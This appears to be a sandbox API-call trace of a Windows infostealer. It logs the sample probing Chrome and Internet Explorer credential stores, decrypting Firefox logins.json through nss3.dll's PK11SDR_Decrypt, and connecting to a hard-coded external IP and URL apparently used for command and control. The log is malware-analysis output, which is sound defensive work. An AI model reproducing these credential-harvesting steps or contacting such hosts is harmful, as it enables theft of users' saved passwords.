	[0219.630] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e0242, cbMultiByte=-1, lpWideCharStr=0x2be0000, cchWideChar=89 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-journal") returned 89
	[0219.630] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-journal" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak-journal"), fInfoLevelId=0x0, lpFileInformation=0x1b5eb48 | out: lpFileInformation=0x1b5eb48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0219.630] GetLastError () returned 0x2
	[0219.630] VirtualFree (lpAddress=0x2be0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.630] ReadFile (in: hFile=0x114, lpBuffer=0x1b5ebcc, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x1b5ebbc, lpOverlapped=0x1b5eb80 | out: lpBuffer=0x1b5ebcc*, lpNumberOfBytesRead=0x1b5ebbc*=0x10, lpOverlapped=0x1b5eb80) returned 1
	[0219.630] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e029b, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85
	[0219.631] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x3000, flProtect=0x4) returned 0x2be0000
	[0219.631] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e029b, cbMultiByte=-1, lpWideCharStr=0x2be0000, cchWideChar=85 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-wal") returned 85
	[0219.631] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data.bak-wal" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\web data.bak-wal"), fInfoLevelId=0x0, lpFileInformation=0x1b5eb78 | out: lpFileInformation=0x1b5eb78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0219.631] GetLastError () returned 0x2
	[0219.631] VirtualFree (lpAddress=0x2be0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.632] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x1b5eb94 | out: lpFileSizeHigh=0x1b5eb94*=0x0) returned 0x10000
	[0219.632] ReadFile (in: hFile=0x114, lpBuffer=0x1748160, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5eb88, lpOverlapped=0x1b5eb4c | out: lpBuffer=0x1748160*, lpNumberOfBytesRead=0x1b5eb88*=0x800, lpOverlapped=0x1b5eb4c) returned 1
	[0219.632] UnlockFileEx (in: hFile=0x114, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x1b5eb20 | out: lpOverlapped=0x1b5eb20) returned 1
	[0219.632] VirtualFree (lpAddress=0x2c60000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.632] VirtualFree (lpAddress=0x2c50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.633] VirtualFree (lpAddress=0x2c30000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.633] VirtualFree (lpAddress=0x2bd0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.634] VirtualFree (lpAddress=0x2b80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.634] VirtualFree (lpAddress=0x2bc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.634] CloseHandle (hObject=0x114) returned 1
	[0219.635] VirtualQuery (in: lpAddress=0x1620000, lpBuffer=0x1b5ee1c, dwLength=0x1c | out: lpBuffer=0x1b5ee1c*(BaseAddress=0x1620000, AllocationBase=0x1620000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.635] VirtualFree (lpAddress=0x1620000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.635] VirtualFree (lpAddress=0x1740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.636] VirtualFree (lpAddress=0x1640000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.636] VirtualFree (lpAddress=0x1630000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.636] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.637] VirtualFree (lpAddress=0x2c10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.637] VirtualFree (lpAddress=0x2c00000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.637] VirtualFree (lpAddress=0x1bb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.638] VirtualFree (lpAddress=0x2070000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.638] VirtualFree (lpAddress=0x2180000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.638] VirtualFree (lpAddress=0x21c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.639] VirtualFree (lpAddress=0x21f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.639] VirtualFree (lpAddress=0x2220000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.639] VirtualFree (lpAddress=0x2360000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.640] VirtualFree (lpAddress=0x2ab0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.640] VirtualFree (lpAddress=0x2bb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.640] VirtualFree (lpAddress=0x2bf0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.641] VirtualFree (lpAddress=0x2ba0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.641] VirtualFree (lpAddress=0x2b30000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.642] VirtualFree (lpAddress=0x2b50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.642] VirtualFree (lpAddress=0x2b60000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.642] VirtualFree (lpAddress=0x2b40000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.643] VirtualFree (lpAddress=0x2b10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.643] VirtualFree (lpAddress=0x2b20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.643] VirtualFree (lpAddress=0x2ad0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.644] VirtualFree (lpAddress=0x2af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.644] VirtualFree (lpAddress=0x2ae0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.644] VirtualFree (lpAddress=0x2a90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.645] VirtualFree (lpAddress=0x2ac0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.645] VirtualFree (lpAddress=0x2aa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.645] VirtualFree (lpAddress=0x2a50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.646] VirtualFree (lpAddress=0x2a70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.646] VirtualFree (lpAddress=0x2a60000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.646] VirtualFree (lpAddress=0x2a20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.647] VirtualFree (lpAddress=0x2a40000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.647] VirtualFree (lpAddress=0x29a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.647] VirtualFree (lpAddress=0x29c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.647] VirtualFree (lpAddress=0x29f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.648] VirtualFree (lpAddress=0x29d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.648] VirtualFree (lpAddress=0x2a10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.649] VirtualFree (lpAddress=0x29e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.649] VirtualFree (lpAddress=0x2a30000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.649] VirtualFree (lpAddress=0x29b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.650] VirtualFree (lpAddress=0x2980000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.650] VirtualFree (lpAddress=0x2990000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.650] VirtualFree (lpAddress=0x2890000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.651] VirtualFree (lpAddress=0x28b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.651] VirtualFree (lpAddress=0x28c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.651] VirtualFree (lpAddress=0x28d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.651] VirtualFree (lpAddress=0x28e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.652] VirtualFree (lpAddress=0x28f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.652] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.652] VirtualFree (lpAddress=0x2910000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.653] VirtualFree (lpAddress=0x2920000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.653] VirtualFree (lpAddress=0x28a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.653] VirtualFree (lpAddress=0x2940000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.654] VirtualFree (lpAddress=0x2950000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.654] VirtualFree (lpAddress=0x2960000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.654] VirtualFree (lpAddress=0x2930000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.655] VirtualFree (lpAddress=0x2870000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.655] VirtualFree (lpAddress=0x2880000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.655] VirtualFree (lpAddress=0x27f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.656] VirtualFree (lpAddress=0x2810000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.656] VirtualFree (lpAddress=0x2840000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.656] VirtualFree (lpAddress=0x2820000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.662] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x24) returned 0x39e530
	[0219.662] GetProcessHeap () returned 0x370000
	[0219.662] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x3) returned 0x398438
	[0219.663] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x3) returned 0x398428
	[0219.663] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x3) returned 0x398458
	[0219.663] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1007a55b, lpParameter=0x39e530, dwCreationFlags=0x0, lpThreadId=0x1010cd50 | out: lpThreadId=0x1010cd50*=0xd04) returned 0x114

Thread:
	id = 221
	os_tid = 0x74c

	[0207.111] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x2c) returned 0x38a2c0
	[0207.111] GetVersionExW (in: lpVersionInformation=0x174ef10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x20, dwBuildNumber=0x77382fe7, dwPlatformId=0x0, szCSDVersion="\xd7c8\x37\x6590\x37\x66b0\x37\x7808\x39\x6a58\x37\x0e\x9c\xeed0\x174") | out: lpVersionInformation=0x174ef10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0207.111] CredEnumerateW (in: Filter="Microsoft_WinInet_*", Flags=0x0, Count=0x174f014, Credential=0x174f000 | out: Count=0x174f014, Credential=0x174f000) returned 0
	[0207.112] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", ulOptions=0x0, samDesired=0x20019, phkResult=0x174f020 | out: phkResult=0x174f020*=0x0) returned 0x2
	[0207.113] ResetEvent (hEvent=0xc) returned 1
	[0207.113] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0207.419] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a2c0 | out: hHeap=0x370000) returned 1

Thread:
	id = 222
	os_tid = 0x7d0

	[0207.113] GetCurrentDirectoryA (in: nBufferLength=0x104, lpBuffer=0x1adfa98 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 0x30
	[0207.113] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Clients\\StartMenuInternet", ulOptions=0x0, samDesired=0x20019, phkResult=0x1adfa84 | out: phkResult=0x1adfa84*=0x104) returned 0x0
	[0207.113] RegEnumKeyExA (in: hKey=0x104, dwIndex=0x0, lpName=0x1adf24c, lpcchName=0x1adfa80, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x1adfa4c | out: lpName="FIREFOX.EXE", lpcchName=0x1adfa80, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x1adfa4c) returned 0x0
	[0207.114] StrStrIA (lpFirst="FIREFOX.EXE", lpSrch="firefox") returned="FIREFOX.EXE"
	[0207.114] lstrlenA (lpString="SOFTWARE\\Clients\\StartMenuInternet") returned 34
	[0207.114] RegCloseKey (hKey=0x104) returned 0x0
	[0207.114] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Clients\\StartMenuInternet\\FIREFOX.EXE\\shell\\open\\command", ulOptions=0x0, samDesired=0x20019, phkResult=0x1adfa84 | out: phkResult=0x1adfa84*=0x104) returned 0x0
	[0207.114] RegQueryValueExA (in: hKey=0x104, lpValueName=0x0, lpReserved=0x0, lpType=0x1adfa54, lpData=0x1010cd78, lpcbData=0x1adfa58*=0x104 | out: lpType=0x1adfa54*=0x1, lpData="\"C:\\Program Files\\Mozilla Firefox\\firefox.exe\"", lpcbData=0x1adfa58*=0x2f) returned 0x0
	[0207.114] RegCloseKey (hKey=0x104) returned 0x0
	[0207.115] SetCurrentDirectoryA (lpPathName="\"C:\\Program Files\\Mozilla Firefox" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\\"c:\\program files\\mozilla firefox")) returned 1
	[0207.115] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x2c) returned 0x38a448
	[0207.115] LoadLibraryA (lpLibFileName="nss3.dll") returned 0x722a0000
	[0208.430] GetProcAddress (hModule=0x722a0000, lpProcName="NSS_Init") returned 0x7235d70b
	[0208.432] GetProcAddress (hModule=0x722a0000, lpProcName="NSS_Shutdown") returned 0x7235d13c
	[0208.432] GetProcAddress (hModule=0x722a0000, lpProcName="PK11_GetInternalKeySlot") returned 0x722f3c51
	[0208.432] GetProcAddress (hModule=0x722a0000, lpProcName="PK11_NeedLogin") returned 0x7230542b
	[0208.432] GetProcAddress (hModule=0x722a0000, lpProcName="PK11_GetTokenName") returned 0x722f39df
	[0208.432] GetProcAddress (hModule=0x722a0000, lpProcName="PK11_Authenticate") returned 0x722dd3ca
	[0208.432] GetProcAddress (hModule=0x722a0000, lpProcName="PK11_CheckUserPassword") returned 0x722dcbc4
	[0208.432] GetProcAddress (hModule=0x722a0000, lpProcName="PK11SDR_Decrypt") returned 0x722f00a7
	[0208.433] GetProcAddress (hModule=0x722a0000, lpProcName="PK11_FreeSlot") returned 0x722f3333
	[0208.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0208.433] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x1adeff8, csidl=26, fCreate=1 | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming") returned 1
	[0208.435] FindFirstFileA (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x1adf17c | out: lpFindFileData=0x1adf17c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9d743a10, ftCreationTime.dwHighDateTime=0x1d348db, ftLastAccessTime.dwLowDateTime=0x9d743a10, ftLastAccessTime.dwHighDateTime=0x1d348db, ftLastWriteTime.dwLowDateTime=0x9d743a10, ftLastWriteTime.dwHighDateTime=0x1d348db, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x730072, dwReserved1=0x32005c, cFileName=".", cAlternateFileName="")) returned 0x399730
	[0208.436] FindNextFileA (in: hFindFile=0x399730, lpFindFileData=0x1adf17c | out: lpFindFileData=0x1adf17c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9d743a10, ftCreationTime.dwHighDateTime=0x1d348db, ftLastAccessTime.dwLowDateTime=0x9d743a10, ftLastAccessTime.dwHighDateTime=0x1d348db, ftLastWriteTime.dwLowDateTime=0x9d743a10, ftLastWriteTime.dwHighDateTime=0x1d348db, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x730072, dwReserved1=0x32005c, cFileName="..", cAlternateFileName="")) returned 1
	[0208.436] FindNextFileA (in: hFindFile=0x399730, lpFindFileData=0x1adf17c | out: lpFindFileData=0x1adf17c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9d743a10, ftCreationTime.dwHighDateTime=0x1d348db, ftLastAccessTime.dwLowDateTime=0x7d07aa60, ftLastAccessTime.dwHighDateTime=0x1d46cf6, ftLastWriteTime.dwLowDateTime=0x7d07aa60, ftLastWriteTime.dwHighDateTime=0x1d46cf6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x730072, dwReserved1=0x32005c, cFileName="azpxkq2q.default", cAlternateFileName="AZPXKQ~1.DEF")) returned 1
	[0208.436] SetLastError (dwErrCode=0x0) 
	[0208.437] NSS_Init () returned 0x0
	[0209.242] CreateFileA (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\azpxkq2q.default\\logins.json" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\mozilla\\firefox\\profiles\\azpxkq2q.default\\logins.json"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0209.242] wsprintfA (in: param_1=0x1adee28, param_2="No passwords found" | out: param_1="No passwords found") returned 18
	[0209.242] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1000) returned 0x3a0378
	[0209.242] FindNextFileA (in: hFindFile=0x399730, lpFindFileData=0x1adf17c | out: lpFindFileData=0x1adf17c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9d743a10, ftCreationTime.dwHighDateTime=0x1d348db, ftLastAccessTime.dwLowDateTime=0x7d07aa60, ftLastAccessTime.dwHighDateTime=0x1d46cf6, ftLastWriteTime.dwLowDateTime=0x7d07aa60, ftLastWriteTime.dwHighDateTime=0x1d46cf6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x730072, dwReserved1=0x32005c, cFileName="azpxkq2q.default", cAlternateFileName="AZPXKQ~1.DEF")) returned 0
	[0209.242] wsprintfA (in: param_1=0x1adf424, param_2="Failed to grab passwords: %s" | out: param_1="Failed to grab passwords: No passwords found") returned 44
	[0209.242] ResetEvent (hEvent=0xc) returned 1
	[0209.242] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0211.881] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a0378 | out: hHeap=0x370000) returned 1
	[0211.881] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a448 | out: hHeap=0x370000) returned 1
	[0211.881] SetCurrentDirectoryA (lpPathName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 1

Thread:
	id = 272
	os_tid = 0xd04

	[0219.665] GetProcessHeap () returned 0x370000
	[0219.665] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x100) returned 0x39a050
	[0219.666] GetProcessHeap () returned 0x370000
	[0219.666] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x57) returned 0x3997d8
	[0219.666] wnsprintfA (in: pszDest=0x39982b, cchDest=3, pszFmt="%i" | out: pszDest="83") returned 2
	[0219.666] GetProcessHeap () returned 0x370000
	[0219.666] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xc) returned 0x39bb88
	[0219.666] GetProcessHeap () returned 0x370000
	[0219.666] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x39bc60
	[0219.666] GetProcessHeap () returned 0x370000
	[0219.666] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x80) returned 0x39a158
	[0219.666] GetProcessHeap () returned 0x370000
	[0219.666] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1d) returned 0x3a1870
	[0219.666] GetTickCount () returned 0xa8d3a6
	[0219.666] Sleep (dwMilliseconds=0x0) 
	[0219.686] GetTickCount () returned 0xa8d3b6
	[0219.686] Sleep (dwMilliseconds=0x3) 
	[0219.695] GetTickCount () returned 0xa8d3c5
	[0219.695] Sleep (dwMilliseconds=0x6) 
	[0219.711] GetTickCount () returned 0xa8d3d5
	[0219.711] Sleep (dwMilliseconds=0x9) 
	[0219.726] GetTickCount () returned 0xa8d3e4
	[0219.727] Sleep (dwMilliseconds=0xc) 
	[0219.747] GetTickCount () returned 0xa8d3f4
	[0219.747] Sleep (dwMilliseconds=0xf) 
	[0219.758] GetTickCount () returned 0xa8d404
	[0219.758] Sleep (dwMilliseconds=0x12) 
	[0219.813] GetTickCount () returned 0xa8d432
	[0219.813] Sleep (dwMilliseconds=0x15) 
	[0219.836] GetTickCount () returned 0xa8d452
	[0219.836] Sleep (dwMilliseconds=0x18) 
	[0219.867] GetTickCount () returned 0xa8d471
	[0219.867] Sleep (dwMilliseconds=0x1b) 
	[0219.898] GetTickCount () returned 0xa8d490
	[0219.898] Sleep (dwMilliseconds=0x1e) 
	[0219.929] GetTickCount () returned 0xa8d4af
	[0219.930] Sleep (dwMilliseconds=0x21) 
	[0219.976] GetTickCount () returned 0xa8d4de
	[0219.976] Sleep (dwMilliseconds=0x24) 
	[0220.023] GetTickCount () returned 0xa8d50d
	[0220.023] Sleep (dwMilliseconds=0x27) 
	[0220.070] GetTickCount () returned 0xa8d53c
	[0220.070] Sleep (dwMilliseconds=0x2a) 
	[0220.117] GetTickCount () returned 0xa8d56a
	[0220.117] Sleep (dwMilliseconds=0x2d) 
	[0220.163] GetProcessHeap () returned 0x370000
	[0220.163] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x26) returned 0x39e5c0
	[0220.163] GetProcessHeap () returned 0x370000
	[0220.163] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a1870 | out: hHeap=0x370000) returned 1
	[0220.163] GetProcessHeap () returned 0x370000
	[0220.163] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x28) returned 0x39e5f0
	[0220.164] GetProcessHeap () returned 0x370000
	[0220.164] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x15) returned 0x3905d8
	[0220.164] VirtualAlloc (lpAddress=0x0, dwSize=0x3, flAllocationType=0x3000, flProtect=0x4) returned 0x20000
	[0220.164] GetProcessHeap () returned 0x370000
	[0220.164] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x28) returned 0x39e620
	[0220.164] GetProcessHeap () returned 0x370000
	[0220.164] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x15) returned 0x3905f8
	[0220.164] VirtualAlloc (lpAddress=0x0, dwSize=0x3, flAllocationType=0x3000, flProtect=0x4) returned 0xe0000
	[0220.164] GetProcessHeap () returned 0x370000
	[0220.164] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x28) returned 0x39e650
	[0220.164] GetProcessHeap () returned 0x370000
	[0220.164] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x15) returned 0x390618
	[0220.164] VirtualAlloc (lpAddress=0x0, dwSize=0x3, flAllocationType=0x3000, flProtect=0x4) returned 0x360000
	[0220.165] strstr (_Str="http://186.159.1.217:8082/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/83/", _SubStr="https://") returned 0x0
	[0220.165] GetProcessHeap () returned 0x370000
	[0220.165] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x48) returned 0x3863c0
	[0220.165] GetProcessHeap () returned 0x370000
	[0220.165] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x20) returned 0x3a1870
	[0220.165] GetProcessHeap () returned 0x370000
	[0220.165] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x11) returned 0x390638
	[0220.165] GetProcessHeap () returned 0x370000
	[0220.165] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x5c) returned 0x39a1e0
	[0220.165] GetProcessHeap () returned 0x370000
	[0220.165] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x1a) returned 0x3a1960
	[0220.165] GetProcessHeap () returned 0x370000
	[0220.165] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x49) returned 0x3949b0
	[0220.165] GetProcessHeap () returned 0x370000
	[0220.165] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x39a1e0 | out: hHeap=0x370000) returned 1
	[0220.165] GetProcessHeap () returned 0x370000
	[0220.165] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390638 | out: hHeap=0x370000) returned 1
	[0220.165] GetProcessHeap () returned 0x370000
	[0220.165] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a1870 | out: hHeap=0x370000) returned 1
	[0220.165] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0220.165] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1aff3f0 | out: lpWSAData=0x1aff3f0) returned 0
	[0220.166] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0220.166] gethostbyname (name="186.159.1.217") returned 0x17763b0*(h_name="186.159.1.217", h_aliases=0x17763c0*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x17763c4*=([0]="186.159.1.217"))
	[0220.215] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0220.215] socket (af=2, type=1, protocol=0) returned 0x1e8
	[0220.218] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75a90000
	[0220.218] connect (s=0x1e8, name=0x1aff594*(sa_family=2, sin_port=0x1f92, sin_addr="186.159.1.217"), namelen=16) returned 0
	[0220.480] GetProcessHeap () returned 0x370000
	[0220.480] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x40d) returned 0x3abc30
	[0220.480] GetModuleHandleA (lpModuleName="urlmon.dll") returned 0x76850000
	[0220.480] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x3abc3c, cbSize=0x1aff58c | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)", cbSize=0x1aff58c) returned 0x0
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0xc4) returned 0x3aaae8
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3abc30 | out: hHeap=0x370000) returned 1
	[0220.485] GetProcessHeap () returned 0x370000
	[0220.485] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x10) returned 0x3a7fb8
	[0220.485] GetProcessHeap () returned 0x370000
